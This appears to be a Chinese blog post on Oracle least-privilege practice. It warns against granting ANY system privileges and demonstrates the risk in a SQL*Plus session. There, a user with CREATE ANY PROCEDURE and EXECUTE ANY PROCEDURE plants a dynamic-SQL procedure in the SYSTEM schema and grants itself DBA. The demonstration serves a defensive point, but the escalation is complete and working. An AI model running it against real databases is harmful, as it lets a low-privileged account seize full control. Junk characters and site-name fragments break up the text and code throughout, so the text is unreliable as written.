Oracle推荐给用户授予权限时,给予用户可以完成操作的最小权限。应当尽量避免对用户授予包含ANY的系统权限,如SELECT ANY TABLE,CREATE ANY TABLE等。
ITPUB个人空间6Y�d5I(b�}2X2{这些包含ANY的系统权限很大,只应该授权给DBA用户,而不应该授权给普通用户。如果给非DBA用户授权ANY系统权限,则会使数据库处于不安全状态。
下面的例子展示了一个用户具有了CREATE ANY PROCEDURE和EXECUTE ANY PROCEDURE权限,就可以通过其他方式获取数据库中所有的权限。
SQL> create user a identified by a;
用户已创建
SQL> grant create session to a;
授权成功。
SQL> grant create any procedure, execute any procedure to a;
授权成功。
SQL> conn a/a@test4
5S�G�D�v Z�?,S3?�C c0已连接。
*?�I+o F�g
V8w�d-h0 SQL> select * from session_privs;
PRIVILEGEITPUB个人空间8_�X
~7T�?9R�@�L�z
----------------------------------------
,f8h�a B�Y�c:F�m0CREATE SESSION
1I&c�e)X6G�A0CREATE ANY PROCEDURE
�A5D!B�o9L0EXECUTE ANY PROCEDURE
SQL> select * from session_roles;
未选定行
SQL> create procedure system.p_execute(p_str in varchar2) as
�R
_2_,l*R [�g0 2 begin
;y�B�{(o�j0P4M�O9j�k0 3 execute immediate p_str;
�c.O)L�y�M0 4 end;ITPUB个人空间�s+\6}+z�Z�R
}
5 /
过程已创建。
SQL> exec system.p_execute('grant dba to a');
PL/SQL 过程已成功完成。
SQL> conn a/a@test4
)V)y�I([�y�[0已连接。
�O:x:l2Z0j2a0SQL> select * from session_privs;
PRIVILEGEITPUB个人空间1k�C�D8j�y�j
----------------------------------------ITPUB个人空间1~�c-i+}�G9K
ALTER SYSTEMITPUB个人空间8l1i
z�f
^+Z*f Y
AUDIT SYSTEMITPUB个人空间,?�[�z�L7Y�t$V�e)T
CREATE SESSIONITPUB个人空间�R�W�j�d�F�`
ALTER SESSIONITPUB个人空间+]�E�H+N�O�p�|�}
RESTRICTED SESSIONITPUB个人空间�s H*s�Q;M
.ITPUB个人空间�w3N2y4q�p�R
.ITPUB个人空间$I�{�f:Z�v�i
B2Q�l�G0s�m
.
3_�i E�t"Q0ALTER ANY RULE SETITPUB个人空间�|"N�T�C-f)B
DROP ANY RULE SETITPUB个人空间�m1V�~ h u+B
EXECUTE ANY RULE SET
已选择140行。
SQL> select * from session_roles;
ROLEITPUB个人空间�K.b3O�u2E+_�[�e1a�F#a
------------------------------
�p�A�R)V�\;N0DBAITPUB个人空间�|�h�B�r�G�}�{
SELECT_CATALOG_ROLEITPUB个人空间*^#c�^+~�G�s�r,P7}!\�^�L
HS_ADMIN_ROLE
:a3b�t�Q(P.P�c�I�r�]0EXECUTE_CATALOG_ROLEITPUB个人空间 S5]�c�p5w9N�^(Z
DELETE_CATALOG_ROLE
�[�Q%N�f�E�Q-y,l"v0y0EXP_FULL_DATABASE
�g�J-R�z"U:j0IMP_FULL_DATABASE
�N�\&~�j�d�X"C0GATHER_SYSTEM_STATISTICSITPUB个人空间�Z&W�?�p�o
WM_ADMIN_ROLE
已选择9行。
